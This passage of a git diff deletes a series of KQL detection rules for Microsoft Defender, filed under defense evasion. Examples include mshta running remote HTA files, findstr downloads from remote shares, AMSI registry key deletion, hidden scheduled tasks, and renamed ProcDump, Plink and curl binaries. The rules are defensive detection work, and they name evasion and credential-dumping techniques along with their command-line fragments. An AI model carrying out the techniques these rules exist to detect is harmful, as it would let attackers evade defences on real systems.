-// Tags: attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql b/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql
deleted file mode 100644
index 9b77679a..00000000
--- a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/10/05
-// Level: medium
-// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l ") and ProcessCommandLine contains "\\\\")
\ No newline at end of file
diff --git a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql b/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql
deleted file mode 100644
index ccf52622..00000000
--- a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: high
-// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files.
-// Tags: attack.defense_evasion, attack.t1220
-DeviceProcessEvents
-| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
deleted file mode 100644
index d0784cd7..00000000
--- a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql b/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql
deleted file mode 100644
index 990767da..00000000
--- a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/06/07
-// Level: high
-// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql
deleted file mode 100644
index 0655e39c..00000000
--- a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/26
-// Level: medium
-// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query"
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql
deleted file mode 100644
index e7a8dadc..00000000
--- a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2022/04/15
-// Level: medium
-// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware
-// Tags: attack.defense_evasion, attack.t1562
-DeviceRegistryEvents
-| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "SD")
\ No newline at end of file
diff --git a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql b/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql
deleted file mode 100644
index 3b5298d1..00000000
--- a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys.
-These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\shell\\open\\command") and (not(((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Opera\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Opera\\")) or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey contains "\\wireshark-capture-file"))))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql b/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql
deleted file mode 100644
index c887b9ee..00000000
--- a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/07
-// Level: medium
-// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_CURL.EXE_Execution.kql b/Defense Evasion/Renamed_CURL.EXE_Execution.kql
deleted file mode 100644
index 5fedd523..00000000
--- a/Defense Evasion/Renamed_CURL.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/09/11
-// Level: medium
-// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql b/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql
deleted file mode 100644
index f1565826..00000000
--- a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/09/20
-// Level: high
-// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_FTP.EXE_Execution.kql b/Defense Evasion/Renamed_FTP.EXE_Execution.kql
deleted file mode 100644
index a2a27522..00000000
--- a/Defense Evasion/Renamed_FTP.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql b/Defense Evasion/Renamed_Jusched.EXE_Execution.kql
deleted file mode 100644
index 059e77e2..00000000
--- a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis, Swisscom
-// Date: 2019/06/04
-// Level: high
-// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group
-// Tags: attack.execution, attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql b/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql
deleted file mode 100644
index e67eb044..00000000
--- a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth
-// Date: 2022/12/05
-// Level: high
-// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_MegaSync_Execution.kql b/Defense Evasion/Renamed_MegaSync_Execution.kql
deleted file mode 100644
index b1b03fbb..00000000
--- a/Defense Evasion/Renamed_MegaSync_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2021/06/22
-// Level: high
-// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql b/Defense Evasion/Renamed_Msdt.EXE_Execution.kql
deleted file mode 100644
index a28480e4..00000000
--- a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/06/03
-// Level: high
-// Description: Detects the execution of a renamed "Msdt.exe" binary
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql b/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql
deleted file mode 100644
index fe83139c..00000000
--- a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2024/03/11
-// Level: high
-// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Office_Binary_Execution.kql b/Defense Evasion/Renamed_Office_Binary_Execution.kql
deleted file mode 100644
index 88a5736c..00000000
--- a/Defense Evasion/Renamed_Office_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the execution of a renamed office binary
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql b/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql
deleted file mode 100644
index 98720000..00000000
--- a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2024/01/11
-// Level: high
-// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
-// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Plink_Execution.kql b/Defense Evasion/Renamed_Plink_Execution.kql
deleted file mode 100644
index 76dd4df8..00000000
--- a/Defense Evasion/Renamed_Plink_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/06
-// Level: high
-// Description: Detects the execution of a renamed version of the Plink binary
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_ProcDump_Execution.kql b/Defense Evasion/Renamed_ProcDump_Execution.kql
deleted file mode 100644
index 09852431..00000000
--- a/Defense Evasion/Renamed_ProcDump_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/11/18
-// Level: high
-// Description: Detects the execution of a renamed ProcDump executable often used by attackers or malware
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "procdump" or ((ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma ") and (ProcessCommandLine contains " -accepteula " or ProcessCommandLine contains " /accepteula "))) and (not((FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql b/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
deleted file mode 100644
index 6b0bdff3..00000000
--- a/Defense Evasion/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/19
-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql b/Defense Evasion/Renamed_Vmnat.exe_Execution.kql
deleted file mode 100644
index 9e5bf562..00000000
--- a/Defense Evasion/Renamed_Vmnat.exe_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/09/09
-// Level: high
-// Description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "vmnat.exe" and (not(FolderPath endswith "vmnat.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql b/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql
deleted file mode 100644
index b9cadb73..00000000
--- a/Defense Evasion/Response_File_Execution_Via_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: medium
-// Description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f ") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe") and ProcessCommandLine contains ".rsp"
\ No newline at end of file
diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql
deleted file mode 100644
index 2611f7a6..00000000
--- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2023/01/13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql b/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql
deleted file mode 100644
index 0bf59ff5..00000000
--- a/Defense Evasion/RestrictedAdminMode_Registry_Value_Tampering_-_ProcCreation.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2023/01/13
-// Level: high
-// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
-RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
-This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa\\" and ProcessCommandLine contains "DisableRestrictedAdmin"
\ No newline at end of file
diff --git a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql b/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql
deleted file mode 100644
index a929c0d8..00000000
--- a/Defense Evasion/Root_Certificate_Installed_From_Susp_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: high
-// Description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains ":\\Windows\\TEMP\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\") and (ProcessCommandLine contains "Import-Certificate" and ProcessCommandLine contains " -FilePath " and ProcessCommandLine contains "Cert:\\LocalMachine\\Root")
\ No newline at end of file
diff --git a/Defense Evasion/RunDLL32_Spawning_Explorer.kql b/Defense Evasion/RunDLL32_Spawning_Explorer.kql
deleted file mode 100644
index f0782750..00000000
--- a/Defense Evasion/RunDLL32_Spawning_Explorer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim, CD_ROM_
-// Date: 2022/04/27
-// Level: high
-// Description: Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\explorer.exe" and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not(InitiatingProcessCommandLine contains "\\shell32.dll,Control_RunDLL"))
\ No newline at end of file
diff --git a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql b/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql
deleted file mode 100644
index ae35c612..00000000
--- a/Defense Evasion/Run_Once_Task_Configuration_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community
-// Date: 2020/11/15
-// Level: medium
-// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql b/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql
deleted file mode 100644
index 614c8ce9..00000000
--- a/Defense Evasion/Run_Once_Task_Execution_as_Configured_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)
-// Date: 2020/10/18
-// Level: low
-// Description: This rule detects the execution of Run Once task as configured in the registry
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper")
\ No newline at end of file
diff --git a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql b/Defense Evasion/Run_PowerShell_Script_from_ADS.kql
deleted file mode 100644
index 0e8c75dc..00000000
--- a/Defense Evasion/Run_PowerShell_Script_from_ADS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
-// Date: 2019/10/30
-// Level: high
-// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
deleted file mode 100644
index bd9b3783..00000000
--- a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
-// Date: 2020/10/17
-// Level: high
-// Description: Detects PowerShell script execution via input stream redirect
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql b/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql
deleted file mode 100644
index 7c4422f8..00000000
--- a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
-// Date: 2022/01/13
-// Level: medium
-// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
